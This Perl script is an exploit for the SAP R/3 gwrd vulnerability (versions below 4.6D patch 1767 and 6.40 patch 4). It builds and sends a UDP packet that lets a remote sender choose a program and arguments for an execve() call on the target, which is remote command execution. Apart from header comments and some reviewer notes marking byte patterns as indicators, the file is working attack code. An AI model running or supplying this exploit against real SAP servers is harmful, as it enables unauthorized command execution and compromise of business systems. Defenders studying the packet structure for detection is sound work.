Linux port of the exploit for the gwrd bug in SAP versions below 4.6D patch 1767 and versions below 6.40 patch 4. Allows for remote command execution. Perl version.
df146978b0f9a1b8ac7a1f5975813e0c7bf897e1d0e696c46d6776c344a2cb75
#!/usr/bin/perl -w
use IO::Socket;
# Unix version of the FX SAP R/3 gwrd vuln.
#
# We partially control a call to execve() made by lnaxdm/sapsys
# Easily exploitable with local access
# Could be done remotely under some conditions
#
# 2003, FX of Phenoelit <fx@phenoelit.de> (Win32 original code)
# 2005, Nicob <nicob@nicob.net> (Unix version)
#
# Driver for the proof of concept: reads positional arguments, builds one
# request buffer in the package global $request, and passes host and port
# to send_UDP(), which reads $request directly.
#
# Arguments, in order: <filename> <arg1> <arg3> <host> [port]
#   - arg1 and arg3 are limited to 8 characters each (checked below).
#   - port defaults to "3317" when omitted.
#   - Each "unless ($x=shift)" test is a truthiness test, so an argument of
#     "0" or "" is treated as missing.
#
# Reviewer notes for defenders:
#   - Every byte before $command is fixed-length: 2 marker bytes, 50 filler
#     bytes, two 8-byte space-padded fields and two literal separators, which
#     is 100 bytes in total. This prefix is what the script puts on the wire.
#   - The "B" filler and the "_0_..."/"_1_..._2_..." separators are what this
#     script sends. Whether the service requires those exact values is not
#     shown here, so treat them as indicators for this PoC only.
#   - The description published with this script gives the affected range as
#     SAP versions below 4.6D patch 1767 and below 6.40 patch 4.
#   - Nothing in this file reads a reply; success or failure is not observable
#     from the sender's side.

# Unbuffered STDOUT.
$|=1;
die "Give filename" unless ($command=shift);
die "Give arg1" unless ($param1=shift);
die "Give arg3" unless ($param3=shift);
# Length limits are enforced before the host argument is read, so an
# over-long field is reported ahead of a missing host.
die "Arg1 too long" if (length($param1) > 8);
die "Arg3 too long" if (length($param3) > 8);
die "Give host" unless ($host=shift);
$port="3317" unless ($port=shift);
# $request is deliberately not declared with "my": send_UDP() reads it as a
# package global rather than receiving it as a parameter.
$request =
# Two leading marker bytes, then 50 bytes of "B" filler.
"\x01".
"\x02".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
# Second arg to execve()
# 8 chars long (right-padded with spaces to exactly 8 bytes)
$param1.
" " x (8 - length($param1)).
# 11-byte literal separator.
"_0_0_0_0_0_".
# Fourth arg to execve()
# 8 chars long (right-padded with spaces to exactly 8 bytes)
# NOTE(review): the variable is named $param3 while this comment calls it the
# fourth argument -- numbering convention not shown here; confirm.
$param3.
" " x (8 - length($param3)).
# 21-byte literal separator.
"_1_1_1_1_1__2_2_2_2_2".
# First arg to execve()
# Unlimited length, end with %00 (a single NUL byte is appended)
$command."\x00";
# Only host and port are passed; the payload travels via the global $request.
&send_UDP($host,$port);
exit 0;
# send_UDP($dest, $port)
#
# Creates a UDP socket to $dest:$port, writes the package-global $request
# to it with one print call, and closes the socket. Nothing is read back,
# so the caller learns nothing about whether the peer received or acted on
# the data. Dies when the socket cannot be created; the result of the
# final close is the sub's return value.
sub send_UDP {
    my ($dest, $port) = @_;

    my $remote = IO::Socket::INET->new(
        Proto    => "udp",
        PeerAddr => $dest,
        PeerPort => "$port",
    );
    die "cannot get socket for $dest" unless $remote;

    # Flush on every write so the buffer leaves before the handle is closed.
    $remote->autoflush(1);

    # $request is not a parameter: it is the global built by the caller.
    print $remote $request;
    close $remote;
}